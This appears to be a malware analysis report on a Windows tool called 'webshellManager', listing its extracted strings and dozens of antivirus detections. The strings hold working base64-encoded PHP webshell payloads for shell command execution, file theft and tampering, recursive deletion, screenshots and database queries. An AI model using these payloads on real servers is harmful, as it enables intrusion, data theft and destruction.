127.0.0.1
select * from table
btnExecSql
lblLogin
Login:
html|*.html
cmsSQL
exportToolStripMenuItem
Export
sqlForm
=eval(base64_decode("ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuRElSRUNUT1JZX1NFUEFSQVRPUi4iLcKkLSI7"));
-(.*?)-
Hostname
Release Name
Server Software
=eval(base64_decode("ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuQHBocF91bmFtZSh2KS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobSkuIi3CpC0twqQtIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQUREUiddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1JFUVVFU1RfVElNRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQURNSU4nXS4iLcKkLS3CpC0iLnBocHZlcnNpb24oKS4iLcKkLSI7"));
Version Information
Machine type
Server Name
Server Address
Server Protocol
Request Time
Document Root
Script FileName
Server Admin
PHP version
=eval(base64_decode("JGQ9bmV3IERpcmVjdG9yeUl0ZXJhdG9yKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ2MnXSkpO2ZvcmVhY2goJGQgYXMgJGspe2lmKCRrLT5pc1JlYWRhYmxlKCk9PWZhbHNlIG9yICRrLT5pc0RvdCgpKWNvbnRpbnVlO2lmKCRrLT5nZXRUeXBlKCk9PSJkaXIiKSR2YXI9JiRmb2xkZXI7ZWxzZSAkdmFyPSYkZmlsZTskdmFyLj0iLWl0bS0twqQtIi51dGY4X2VuY29kZSgieyRrfSIpLiItwqQtLcKkLSIuJGstPmdldFNpemUoKS4iLcKkLS3CpC0iLkBzdWJzdHIoc3ByaW50ZignJW8nLCRrLT5nZXRQZXJtcygpKSwtNCkuIi3CpC0twqQtIi5kYXRlKCdtL2QvWSBoOm06cycsJGstPmdldE1UaW1lKCkpLiItwqQtLcKkLSIuQG1pbWVfY29udGVudF90eXBlKCRrLT5nZXRSZWFsUGF0aCgpKS4iLcKkLS1pdG0tIjt9ZWNobyAiLXB0aMKkLSIucmVhbHBhdGgoYmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKSkuIi1wdGjCpC0iLiItZmlsZcKkLSIuJGZpbGUuIi1maWxlwqQtIi4iLWZvbGRlcsKkLSIuJGZvbGRlci4iLWZvbGRlcsKkLSI7"));&c=
-(.*?)-file
-folder
(.*?)-folder
-(.*?)-pth
-itm-(.*?)-itm-
=eval(base64_decode("JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKTtlY2hvICItwqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWF0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWN0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZW10aW1lKCRjKSkuIi3CpC0twqQtIi5maWxlc2l6ZSgkYykuIi3CpC0twqQtIi5taW1lX2NvbnRlbnRfdHlwZSgkYykuIi3CpC0iOw=="));&c=
Last access
Last change
Last modified
Mime content type
=eval(base64_decode(base64_decode("SkdFOVlYSnlZWGtvS1Rza1lqMXRlWE54YkdsZlkyOXVibVZqZENoaVlYTmxOalJmWkdWamIyUmxLQ1JmUjBWVVd5SmpJbDBwTEdKaApjMlUyTkY5a1pXTnZaR1VvSkY5SFJWUmJJbVFpWFNrc1ltRnpaVFkwWDJSbFkyOWtaU2drWDBkRlZGc2laU0pkS1N4aVlYTmxOalJmClpHVmpiMlJsS0NSZlIwVlVXeUptSWwwcEtUc2taVDF0ZVhOeGJHbGZjWFZsY25rb0pHSXNZbUZ6WlRZMFgyUmxZMjlrWlNna1gwZEYKVkZzaVp5SmRLU2s3ZDJocGJHVW9KSEp2ZHowa1pTMCtabVYwWTJoZllYSnlZWGtvVFZsVFVVeEpYMEZUVTA5REtTbGhjbkpoZVY5dwpkWE5vS0NSaExDUnliM2NwTzJadmNtVmhZMmdvWVhKeVlYbGZhMlY1Y3lna1lWc3dYU2xoY3lBa2F5bGxZMmh2SUNjdFkyOXN3cVF0Ckp5NGtheTRuTFdOdmJNS2tMU2M3Wm05eVpXRmphQ2drWVNCaGN5QWtiR2x1WlNsN1pXTm9ieUFuTGNLa0xTYzdabTl5WldGamFDaGgKY25KaGVWOTJZV3gxWlhNb0pHeHBibVVwWVhNZ0pHbDBiU2xsWTJodklDY3RhWFJ0d3FRdEp5NGthWFJ0TGljdGFYUnR3cVF0Snp0bApZMmh2SUNjdHdxUXRKenQ5")));&c=
-(.*?)-col
-(.*?)-itm
=eval(base64_decode("JGltPWltYWdlZ3JhYnNjcmVlbigpO29iX3N0YXJ0KCk7aW1hZ2VwbmcoJGltKTskaW1hZ2VkYXRhPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIi1pdG0tIi5iYXNlNjRfZW5jb2RlKCRpbWFnZWRhdGEpLiItaXRtLSI7"));
=eval(base64_decode("bWtkaXIoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImMiXSkpKTs="));&c=
=eval(base64_decode("JGw9aWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKTtpZihpc19kaXIoJGwpKXtpZihQSFBfT1M9PT0nV2luZG93cycpe2V4ZWMoJ3JtZGlyIC1yZiAiJy4kbC4nIicpO31lbHNle2V4ZWMoJ3JkIC9zIC9xICInLiRsLiciJyk7fX1lbHNle3VubGluaygkbCk7fQ=="));&c=
=eval(base64_decode("cmVuYW1lKGljb252KCJVVEYtOCIsIkNQMTI1MiIsYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSksaWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJkIl0pKSk7"));&c=
=eval(base64_decode(base64_decode("SkhBOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLVHNrY0hvOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLUzRpTGxwSlVDSTdKSG85Ym1WM0lGcHBjRUZ5WTJocGRtVTdhV1lvSkhvdFBtOXdaVzRvSkhCNkxGcHBjRUZ5WTJocGRtVTZPa05TUlVGVVJTazlQVDFVVWxWRktYdHBaaWhwYzE5a2FYSW9KSEFwS1hza1ptWTlibVYzSUZKbFkzVnljMmwyWlVsMFpYSmhkRzl5U1hSbGNtRjBiM0lvYm1WM0lGSmxZM1Z5YzJsMlpVUnBjbVZqZEc5eWVVbDBaWEpoZEc5eUtDUndLU3hTWldOMWNuTnBkbVZKZEdWeVlYUnZja2wwWlhKaGRHOXlPanBNUlVGV1JWTmZUMDVNV1NrN1ptOXlaV0ZqYUNna1ptWWdZWE1nSkc1aGJXVTlQaVJtS1h0cFppZ2hKR1l0UG1selJHbHlLQ2twZXlSbWNEMGtaaTArWjJWMFVtVmhiRkJoZEdnb0tUc2tjbkE5YzNWaWMzUnlLQ1JtY0N4emRISnNaVzRvSkhBcEt6RXBPeVI2TFQ1aFpHUkdhV3hsS0NSbWNDd2tjbkFwTzMxOWZXVnNjMlY3SkhvdFBtRmtaRVpwYkdVb0pIQXNZbUZ6Wlc1aGJXVW9KSEFwS1R0OUpIb3RQbU5zYjNObEtDazdmV1ZqYUc4Z0pIQjZPdz09")));&c=
=eval(base64_decode("ZmlsZV9wdXRfY29udGVudHMoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImQiXSkpLCBmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKSk7"));&c=
=eval(base64_decode("ZWNobyAiLcKkLSIuYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cyhpY29udigiVVRGLTgiLCAiQ1AxMjUyIiwgYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSkpKS4iLcKkLSI7"));&c=
=eval(base64_decode("JGMgPSBiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pOyAkbCA9IGRpcm5hbWUoX19GSUxFX18pIC4gIi9zaGNtZC50eHQiOyBpZiAoUEhQX09TID09ICdXSU5OVCcgfHwgUEhQX09TID09ICdXSU4zMicgfHwgUEhQX09TID09ICdXaW5kb3dzJykgeyBzaGVsbF9leGVjKCRjIC4gIj4iIC4gJGwpOyAkbyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRsKTsgaWYgKGZpbGVfZXhpc3RzKCRsKSkgdW5saW5rKCRsKTsgfSBlbHNlIHsgJG8gPSBzaGVsbF9leGVjKCRjKTsgfSBlY2hvICItwqQtIiAuICRvIC4gIi3CpC0iOw=="));&c=
echo "-
=eval(base64_decode("
error.
The selected webshell is not in the list of webshells
server(s)
\webshells.dat
data saved in webshells.dat
can't load the data of webshells.dat
statusStrip
x servers
tssLabel
0 server(s)
lvWebShells
Release name
cMenuStripLV
informationsToolStripMenuItem
Information
fileManagerToolStripMenuItem
File Manager
shellToolStripMenuItem
sQLExplorerToolStripMenuItem
SQL Explorer
ScreenshotToolStripMenuItem
toolStripSeparator1
deleteToolStripMenuItem
toolStrip
tsButtonAdd.Image
tsButtonAdd
tsButtonSave.Image
tsButtonSave
toolStripSeparator2
tsButtonAbout.Image
tsButtonAbout
pHPExecToolStripMenuItem
PHP Exec
wsManagerForm
wsManager
webshellManager
ZBJUCE57ZE7AF4JZ
FormDelegates.SmartExtensions
webshellManager.Properties.Resources
Setting0
ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuRElSRUNUT1JZX1NFUEFSQVRPUi4iLcKkLSI7
ZWNobyAiLcKkLSIuQHBocF91bmFtZShzKS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobikuIi3CpC0twqQtIi5AcGhwX3VuYW1lKHIpLiItwqQtLcKkLSIuQHBocF91bmFtZSh2KS4iLcKkLS3CpC0iLkBwaHBfdW5hbWUobSkuIi3CpC0twqQtIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQUREUiddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9TT0ZUV0FSRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ1JFUVVFU1RfVElNRSddLiItwqQtLcKkLSIuJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTQ1JJUFRfRklMRU5BTUUnXS4iLcKkLS3CpC0iLiRfU0VSVkVSWydTRVJWRVJfQURNSU4nXS4iLcKkLS3CpC0iLnBocHZlcnNpb24oKS4iLcKkLSI7
JGMgPSBiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pOyAkbCA9IGRpcm5hbWUoX19GSUxFX18pIC4gIi9zaGNtZC50eHQiOyBpZiAoUEhQX09TID09ICdXSU5OVCcgfHwgUEhQX09TID09ICdXSU4zMicgfHwgUEhQX09TID09ICdXaW5kb3dzJykgeyBzaGVsbF9leGVjKCRjIC4gIj4iIC4gJGwpOyAkbyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRsKTsgaWYgKGZpbGVfZXhpc3RzKCRsKSkgdW5saW5rKCRsKTsgfSBlbHNlIHsgJG8gPSBzaGVsbF9leGVjKCRjKTsgfSBlY2hvICItwqQtIiAuICRvIC4gIi3CpC0iOw==
JGQ9bmV3IERpcmVjdG9yeUl0ZXJhdG9yKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ2MnXSkpO2ZvcmVhY2goJGQgYXMgJGspe2lmKCRrLT5pc1JlYWRhYmxlKCk9PWZhbHNlIG9yICRrLT5pc0RvdCgpKWNvbnRpbnVlO2lmKCRrLT5nZXRUeXBlKCk9PSJkaXIiKSR2YXI9JiRmb2xkZXI7ZWxzZSAkdmFyPSYkZmlsZTskdmFyLj0iLWl0bS0twqQtIi51dGY4X2VuY29kZSgieyRrfSIpLiItwqQtLcKkLSIuJGstPmdldFNpemUoKS4iLcKkLS3CpC0iLkBzdWJzdHIoc3ByaW50ZignJW8nLCRrLT5nZXRQZXJtcygpKSwtNCkuIi3CpC0twqQtIi5kYXRlKCdtL2QvWSBoOm06cycsJGstPmdldE1UaW1lKCkpLiItwqQtLcKkLSIuQG1pbWVfY29udGVudF90eXBlKCRrLT5nZXRSZWFsUGF0aCgpKS4iLcKkLS1pdG0tIjt9ZWNobyAiLXB0aMKkLSIucmVhbHBhdGgoYmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKSkuIi1wdGjCpC0iLiItZmlsZcKkLSIuJGZpbGUuIi1maWxlwqQtIi4iLWZvbGRlcsKkLSIuJGZvbGRlci4iLWZvbGRlcsKkLSI7
JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsnYyddKTtlY2hvICItwqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWF0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZWN0aW1lKCRjKSkuIi3CpC0twqQtIi5kYXRlKCJkLW0tWSBIOmk6cyIsZmlsZW10aW1lKCRjKSkuIi3CpC0twqQtIi5maWxlc2l6ZSgkYykuIi3CpC0twqQtIi5taW1lX2NvbnRlbnRfdHlwZSgkYykuIi3CpC0iOw==
bWtkaXIoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImMiXSkpKTs=
JGw9aWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKTtpZihpc19kaXIoJGwpKXtpZihQSFBfT1M9PT0nV2luZG93cycpe2V4ZWMoJ3JtZGlyIC1yZiAiJy4kbC4nIicpO31lbHNle2V4ZWMoJ3JkIC9zIC9xICInLiRsLiciJyk7fX1lbHNle3VubGluaygkbCk7fQ==
cmVuYW1lKGljb252KCJVVEYtOCIsIkNQMTI1MiIsYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSksaWNvbnYoIlVURi04IiwiQ1AxMjUyIixiYXNlNjRfZGVjb2RlKCRfR0VUWyJkIl0pKSk7
ZmlsZV9wdXRfY29udGVudHMoaWNvbnYoIlVURi04IiwgIkNQMTI1MiIsIGJhc2U2NF9kZWNvZGUoJF9HRVRbImQiXSkpLCBmaWxlX2dldF9jb250ZW50cyhiYXNlNjRfZGVjb2RlKCRfR0VUWyJjIl0pKSk7
ZWNobyAiLcKkLSIuYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cyhpY29udigiVVRGLTgiLCAiQ1AxMjUyIiwgYmFzZTY0X2RlY29kZSgkX0dFVFsiYyJdKSkpKS4iLcKkLSI7
JGltPWltYWdlZ3JhYnNjcmVlbigpO29iX3N0YXJ0KCk7aW1hZ2VwbmcoJGltKTskaW1hZ2VkYXRhPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gIi1pdG0tIi5iYXNlNjRfZW5jb2RlKCRpbWFnZWRhdGEpLiItaXRtLSI7
SkdFOVlYSnlZWGtvS1Rza1lqMXRlWE54YkdsZlkyOXVibVZqZENoaVlYTmxOalJmWkdWamIyUmxLQ1JmUjBWVVd5SmpJbDBwTEdKaApjMlUyTkY5a1pXTnZaR1VvSkY5SFJWUmJJbVFpWFNrc1ltRnpaVFkwWDJSbFkyOWtaU2drWDBkRlZGc2laU0pkS1N4aVlYTmxOalJmClpHVmpiMlJsS0NSZlIwVlVXeUptSWwwcEtUc2taVDF0ZVhOeGJHbGZjWFZsY25rb0pHSXNZbUZ6WlRZMFgyUmxZMjlrWlNna1gwZEYKVkZzaVp5SmRLU2s3ZDJocGJHVW9KSEp2ZHowa1pTMCtabVYwWTJoZllYSnlZWGtvVFZsVFVVeEpYMEZUVTA5REtTbGhjbkpoZVY5dwpkWE5vS0NSaExDUnliM2NwTzJadmNtVmhZMmdvWVhKeVlYbGZhMlY1Y3lna1lWc3dYU2xoY3lBa2F5bGxZMmh2SUNjdFkyOXN3cVF0Ckp5NGtheTRuTFdOdmJNS2tMU2M3Wm05eVpXRmphQ2drWVNCaGN5QWtiR2x1WlNsN1pXTm9ieUFuTGNLa0xTYzdabTl5WldGamFDaGgKY25KaGVWOTJZV3gxWlhNb0pHeHBibVVwWVhNZ0pHbDBiU2xsWTJodklDY3RhWFJ0d3FRdEp5NGthWFJ0TGljdGFYUnR3cVF0Snp0bApZMmh2SUNjdHdxUXRKenQ5
SkhBOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLVHNrY0hvOWFXTnZibllvSWxWVVJpMDRJaXdpUTFBeE1qVXlJaXhpWVhObE5qUmZaR1ZqYjJSbEtDUmZSMFZVV3lKaklsMHBLUzRpTGxwSlVDSTdKSG85Ym1WM0lGcHBjRUZ5WTJocGRtVTdhV1lvSkhvdFBtOXdaVzRvSkhCNkxGcHBjRUZ5WTJocGRtVTZPa05TUlVGVVJTazlQVDFVVWxWRktYdHBaaWhwYzE5a2FYSW9KSEFwS1hza1ptWTlibVYzSUZKbFkzVnljMmwyWlVsMFpYSmhkRzl5U1hSbGNtRjBiM0lvYm1WM0lGSmxZM1Z5YzJsMlpVUnBjbVZqZEc5eWVVbDBaWEpoZEc5eUtDUndLU3hTWldOMWNuTnBkbVZKZEdWeVlYUnZja2wwWlhKaGRHOXlPanBNUlVGV1JWTmZUMDVNV1NrN1ptOXlaV0ZqYUNna1ptWWdZWE1nSkc1aGJXVTlQaVJtS1h0cFppZ2hKR1l0UG1selJHbHlLQ2twZXlSbWNEMGtaaTArWjJWMFVtVmhiRkJoZEdnb0tUc2tjbkE5YzNWaWMzUnlLQ1JtY0N4emRISnNaVzRvSkhBcEt6RXBPeVI2TFQ1aFpHUkdhV3hsS0NSbWNDd2tjbkFwTzMxOWZXVnNjMlY3SkhvdFBtRmtaRVpwYkdVb0pIQXNZbUZ6Wlc1aGJXVW9KSEFwS1R0OUpIb3RQbU5zYjNObEtDazdmV1ZqYUc4Z0pIQjZPdz09
imgListExplorer.ImageStream
tsButtonAbout.Image
tsButtonAdd.Image
tsButtonSave.Image
ODhZuvIPF
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
wsManager
FileVersion
0.8.0.0
InternalName
xFGzRuFvp.exe
LegalCopyright
Copyright
Fayva
LegalTrademarks
OriginalFilename
xFGzRuFvp.exe
ProductName
webshellManager
ProductVersion
0.8.0.0
Assembly Version
0.8.0.0
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.PasswordStealer.GenericKD.36996310
CMC Clean
CAT-QuickHeal Trojanpws.Msil
Qihoo-360 Clean
McAfee PWS-FCWJ!97BE1A66ADC4
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
AegisLab Trojan.MSIL.Agensla.i!c
Sangfor Infostealer.MSIL.Agensla.gen
K7AntiVirus Trojan ( 0057cc681 )
BitDefender Trojan.PasswordStealer.GenericKD.36996310
K7GW Trojan ( 0057cc681 )
Cybereason malicious.000465
BitDefenderTheta Clean
Cyren W32/MSIL_Kryptik.EIA.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Kryptik.ABAD
Baidu Clean
APEX Malicious
Avast Win32:PWSX-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
Alibaba Trojan:Win32/starter.ali1000139
NANO-Antivirus Trojan.Win32.Agensla.ivvegk
ViRobot Trojan.Win32.Z.Kryptik.750592.AY
Rising Trojan.Kryptik/MSIL!1.D62C (CLASSIC)
Ad-Aware Trojan.PasswordStealer.GenericKD.36996310
TACHYON Clean
Emsisoft Trojan.Crypt (A)
Comodo Malware@#2sn2wh89lfaxd
F-Secure Clean
DrWeb Trojan.Inject4.11986
Zillya Trojan.Kryptik.Win32.3249620
TrendMicro TROJ_GEN.R002C0DES21
McAfee-GW-Edition PWS-FCWJ!97BE1A66ADC4
FireEye Generic.mg.97be1a66adc40eb9
Sophos Mal/Generic-S
Ikarus Trojan.MSIL.Inject
GData Trojan.PasswordStealer.GenericKD.36996310
Jiangmin Clean
Webroot Clean
Avira TR/AD.Nanocore.vdmek
Antiy-AVL Clean
Kingsoft Win32.PSWTroj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Kryptik.oa
Arcabit Trojan.PasswordStealer.Generic.D23484D6
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.MSIL.Agensla.gen
Microsoft Trojan:MSIL/AgentTesla.AYL!MTB
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win.Generic.C4480009
Acronis Clean
VBA32 TScope.Trojan.MSIL
ALYac Trojan.PasswordStealer.GenericKD.36996310
MAX malware (ai score=80)
Malwarebytes Trojan.MalPack.PNG.Generic
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DES21
Tencent Clean
Yandex Trojan.Kryptik!Z3DJxU3N8cw
SentinelOne Static AI - Malicious PE
eGambit Clean
Fortinet MSIL/Kryptik.ABAM!tr
AVG Win32:PWSX-gen [Trj]
Paloalto generic.ml
CrowdStrike win/malicious_confidence_90% (W)
MaxSecure Trojan.Malware.74499699.susgen
No IRMA results available.